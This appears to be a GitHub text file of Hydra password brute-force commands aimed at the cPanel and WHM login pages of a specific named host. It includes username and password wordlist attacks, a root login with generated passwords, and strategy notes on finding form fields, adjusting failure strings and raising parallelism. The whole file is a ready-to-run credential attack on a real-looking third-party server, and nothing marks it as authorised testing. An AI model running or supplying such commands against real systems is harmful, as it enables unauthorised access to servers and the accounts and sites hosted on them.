-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy patha.txt
73 lines (45 loc) · 3.19 KB
/
a.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
hydra -l admin -P /Users/air/GitHubRep/passlist.txt -s 2083 \
-f -V -e ns -t 4 \
https-post-form://cpanel.mtp.ge/ \
"login_form_field=^USER^&password_form_field=^PASS^:F=incorrect"
• -l admin: Single login attempt with the username admin.
• -P /Users/air/GitHubRep/passlist.txt: Password list to try.
• -s 2083: cPanel often runs on port 2083 for SSL.
• -f: Exit upon finding the first valid credential.
• -V: Verbose mode, prints login attempts in real time.
• -e ns: Also tries no password and login-as-password permutations.
• -t 4: 4 parallel tasks.
• https-post-form: Hydra module for HTTPS POST-based login.
Note: The F=incorrect part matches the known failure string on the returned web page. Adjust the form parameter names (login_form_field, password_form_field) and the failure string (incorrect) to the actual cPanel login form fields and failure message.
hydra -L /Users/air/GitHubRep/usernames.txt \
-P /Users/air/GitHubRep/passlist.txt \
-s 2083 -S -F -e s -V -t 8 \
cpanel.mtp.ge https-post-form \
"/login_script_path:user_field=^USER^&pass_field=^PASS^:F=Authentication Failed"
• -L / -P: Multiple username and password attempts from lists.
• -S: Force SSL usage.
• -F: Exit when a valid login/password pair is found for a given user.
• -e s: Tries login as password.
• -t 8: Use 8 parallel tasks to speed up attempts.
• “F=Authentication Failed”: Adjust for the actual failure string.
hydra -L /Users/air/GitHubRep/usernames.txt \
-P /Users/air/GitHubRep/passlist.txt \
-s 2087 -S -V -o /Users/air/GitHubRep/results_whm.txt -t 8 \
cpanel.mtp.ge https-post-form \
"/whm_login_script:username=^USER^&password=^PASS^:F=error_login"
• -s 2087: Common port for cPanel/WHM administrative interface.
• -o /Users/air/GitHubRep/results_whm.txt: Saves successful findings and relevant details to a file.
• -V: Verbose output.
If you only suspect short random credentials (less common for cPanel but informative for demonstration), you can use:
hydra -l root -x 3:5:aA1 -s 2083 -S -V \
https-post-form://cpanel.mtp.ge/ \
"user=^USER^&pass=^PASS^:F=access denied"
• -x 3:5:aA1: Generate passwords of length 3 to 5 with lowercase letters, uppercase letters, and digits.
• -l root: Single fixed login.
• -V: Verbose to watch attempts.
3. Strategy Notes
1. Gather Form Parameters: Inspect the cPanel login page (or WHM page) using your web browser’s Developer Tools to verify the precise field names and any hidden token parameters.
2. Identify Failure Strings: Confirm the correct failure text or HTTP status code returned after a bad login. If Hydra cannot detect invalid logins properly, adjust the “F=” string.
3. Parallel Tasks: For more speed, increase -t carefully. Overloading a server can cause rate limiting or erroneous results.
4. Exit Conditions: Using -f or -F can terminate the brute force upon first success or first success per user, respectively. This is practical if you only need one valid credential.
5. Check Mac-Specific Binaries: If Hydra complains about missing SSL, re-check your compile flags, environment variables, and library paths for OpenSSL on macOS.